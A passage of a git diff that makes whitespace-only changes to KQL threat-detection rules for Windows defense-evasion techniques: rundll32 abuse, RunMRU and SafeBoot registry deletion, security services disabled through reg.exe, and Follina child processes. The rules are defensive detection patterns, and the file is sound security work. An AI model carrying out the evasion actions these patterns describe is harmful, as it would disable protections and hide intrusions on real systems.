Evasion/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql index fbaa2c0d..985461e4 100644 --- a/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql +++ b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql @@ -1,10 +1,10 @@ -// Title: Run PowerShell Script from Redirected Input Stream -// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community -// Date: 2020-10-17 -// Level: high -// Description: Detects PowerShell script execution via input stream redirect -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Run PowerShell Script from Redirected Input Stream +// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community +// Date: 2020-10-17 +// Level: high +// Description: Detects PowerShell script execution via input stream redirect +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 + +DeviceProcessEvents | where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql index 01708432..478a3349 100644 --- a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql +++ b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql @@ -1,10 +1,10 @@ -// Title: Rundll32 Execution With Uncommon DLL Extension -// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou -// Date: 2022-01-13 -// Level: medium -// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: Rundll32 Execution With Uncommon DLL Extension +// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou +// Date: 2022-01-13 +// Level: medium +// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql index fc1730b5..fd90afa2 100644 --- a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql +++ b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql @@ -1,12 +1,12 @@ -// Title: Rundll32 Execution Without CommandLine Parameters -// Author: Florian Roth (Nextron Systems) -// Date: 2021-05-27 -// Level: high -// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 -// False Positives: -// - Possible but rare - -DeviceProcessEvents +// Title: Rundll32 Execution Without CommandLine Parameters +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-27 +// Level: high +// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Possible but rare + +DeviceProcessEvents | where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql index 2542ed68..d34e1e69 100644 --- a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql +++ b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql @@ -1,12 +1,12 @@ -// Title: Rundll32 InstallScreenSaver Execution -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec -// Date: 2022-04-28 -// Level: medium -// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver -// MITRE Tactic: Defense Evasion -// Tags: attack.t1218.011, attack.defense-evasion -// False Positives: -// - Legitimate installation of a new screensaver - -DeviceProcessEvents +// Title: Rundll32 InstallScreenSaver Execution +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec +// Date: 2022-04-28 +// Level: medium +// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218.011, attack.defense-evasion +// False Positives: +// - Legitimate installation of a new screensaver + +DeviceProcessEvents | where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql index 330ad0cd..ba46f5e8 100644 --- a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql +++ b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql @@ -1,12 +1,12 @@ -// Title: Rundll32 Internet Connection -// Author: Florian Roth (Nextron Systems) -// Date: 2017-11-04 -// Level: medium -// Description: Detects a rundll32 that communicates with public IP addresses -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, attack.execution -// False Positives: -// - Communication to other corporate systems that use IP addresses from public address spaces - -DeviceNetworkEvents +// Title: Rundll32 Internet Connection +// Author: Florian Roth (Nextron Systems) +// Date: 2017-11-04 +// Level: medium +// Description: Detects a rundll32 that communicates with public IP addresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, attack.execution +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql index ab0ec4f3..318cee1b 100644 --- a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql +++ b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql @@ -1,10 +1,10 @@ -// Title: Rundll32 Spawned Via Explorer.EXE -// Author: CD_ROM_ -// Date: 2022-05-21 -// Level: medium -// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Rundll32 Spawned Via Explorer.EXE +// Author: CD_ROM_ +// Date: 2022-05-21 +// Level: medium +// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql index 9a627673..37f35119 100644 --- a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql +++ b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql @@ -1,10 +1,10 @@ -// Title: RunDLL32 Spawning Explorer -// Author: elhoim, CD_ROM_ -// Date: 2022-04-27 -// Level: high -// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: RunDLL32 Spawning Explorer +// Author: elhoim, CD_ROM_ +// Date: 2022-04-27 +// Level: high +// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql index a3ae7d5a..07ea6d5e 100644 --- a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql +++ b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql @@ -1,12 +1,12 @@ -// Title: Rundll32 UNC Path Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-10 -// Level: high -// Description: Detects rundll32 execution where the DLL is located on a remote location (share) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Rundll32 UNC Path Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects rundll32 execution where the DLL is located on a remote location (share) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql index 982770ca..a2c6dfe5 100644 --- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql +++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql @@ -1,12 +1,12 @@ -// Title: RunMRU Registry Key Deletion -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-25 -// Level: high -// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog. -// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. -// Adversaries may delete this key to cover their tracks after executing commands. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.003 - -DeviceProcessEvents +// Title: RunMRU Registry Key Deletion +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-25 +// Level: high +// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog. +// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. +// Adversaries may delete this key to cover their tracks after executing commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.003 + +DeviceProcessEvents | where (ProcessCommandLine contains " del" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql index b44d889b..b7c5713f 100644 --- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql +++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql @@ -1,12 +1,12 @@ -// Title: RunMRU Registry Key Deletion - Registry -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-25 -// Level: high -// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. -// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. -// Adversaries may delete this key to cover their tracks after executing commands. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.003 - -DeviceRegistryEvents +// Title: RunMRU Registry Key Deletion - Registry +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-25 +// Level: high +// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. +// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. +// Adversaries may delete this key to cover their tracks after executing commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.003 + +DeviceRegistryEvents | where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql index 194f598a..73990aa8 100644 --- a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: SafeBoot Registry Key Deleted Via Reg.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton -// Date: 2022-08-08 -// Level: high -// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: SafeBoot Registry Key Deleted Via Reg.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton +// Date: 2022-08-08 +// Level: high +// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/scr_file_write_event.kql b/KQL/rules/Defense Evasion/scr_file_write_event.kql index b69329c3..24feec24 100644 --- a/KQL/rules/Defense Evasion/scr_file_write_event.kql +++ b/KQL/rules/Defense Evasion/scr_file_write_event.kql @@ -1,12 +1,12 @@ -// Title: SCR File Write Event -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2022-04-27 -// Level: medium -// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - The installation of new screen savers by third party software - -DeviceFileEvents +// Title: SCR File Write Event +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +// Date: 2022-04-27 +// Level: medium +// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - The installation of new screen savers by third party software + +DeviceFileEvents | where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql index 89df8598..5f65fc7f 100644 --- a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql +++ b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql @@ -1,12 +1,12 @@ -// Title: ScreenSaver Registry Key Set -// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) -// Date: 2022-05-04 -// Level: medium -// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - Legitimate use of screen saver - -DeviceRegistryEvents +// Title: ScreenSaver Registry Key Set +// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) +// Date: 2022-05-04 +// Level: medium +// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Legitimate use of screen saver + +DeviceRegistryEvents | where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql index 28cced97..3ee13923 100644 --- a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql +++ b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql @@ -1,12 +1,12 @@ -// Title: Scripted Diagnostics Turn Off Check Enabled - Registry -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2022-06-15 -// Level: medium -// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Administrator actions - -DeviceRegistryEvents +// Title: Scripted Diagnostics Turn Off Check Enabled - Registry +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +// Date: 2022-06-15 +// Level: medium +// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql index e40543bc..00dc8185 100644 --- a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql +++ b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql @@ -1,13 +1,13 @@ -// Title: Scripting/CommandLine Process Spawned Regsvr32 -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-26 -// Level: medium -// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary -// - Some legitimate Windows services - -DeviceProcessEvents +// Title: Scripting/CommandLine Process Spawned Regsvr32 +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: medium +// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary +// - Some legitimate Windows services + +DeviceProcessEvents | where (FolderPath endswith "\\regsvr32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((ProcessCommandLine endswith " /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sdclt_child_processes.kql b/KQL/rules/Defense Evasion/sdclt_child_processes.kql index fd5192cf..c4078c64 100644 --- a/KQL/rules/Defense Evasion/sdclt_child_processes.kql +++ b/KQL/rules/Defense Evasion/sdclt_child_processes.kql @@ -1,10 +1,10 @@ -// Title: Sdclt Child Processes -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: medium -// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: Sdclt Child Processes +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\sdclt.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql index b5db0b02..e078f6f0 100644 --- a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql +++ b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql @@ -1,10 +1,10 @@ -// Title: Sdiagnhost Calling Suspicious Child Process -// Author: Nextron Systems, @Kostastsale -// Date: 2022-06-01 -// Level: high -// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1218 - -DeviceProcessEvents +// Title: Sdiagnhost Calling Suspicious Child Process +// Author: Nextron Systems, @Kostastsale +// Date: 2022-06-01 +// Level: high +// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1218 + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe") and (not(((ProcessCommandLine contains "bits" and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine endswith "-noprofile -" or ProcessCommandLine endswith "-noprofile") and FolderPath endswith "\\powershell.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql index 07766f9a..3bb1cf80 100644 --- a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Security Service Disabled Via Reg.EXE -// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim -// Date: 2021-07-14 -// Level: high -// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Security Service Disabled Via Reg.EXE +// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim +// Date: 2021-07-14 +// Level: high +// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql index 0328c4af..8f0f371a 100644 --- a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql @@ -1,13 +1,13 @@ -// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-05 -// Level: high -// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. -// This behavior has been observed in-the-wild by different threat actors. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Administrators building packages using iexpress.exe - -DeviceProcessEvents +// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-05 +// Level: high +// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. +// This behavior has been observed in-the-wild by different threat actors. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Administrators building packages using iexpress.exe + +DeviceProcessEvents | where (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains 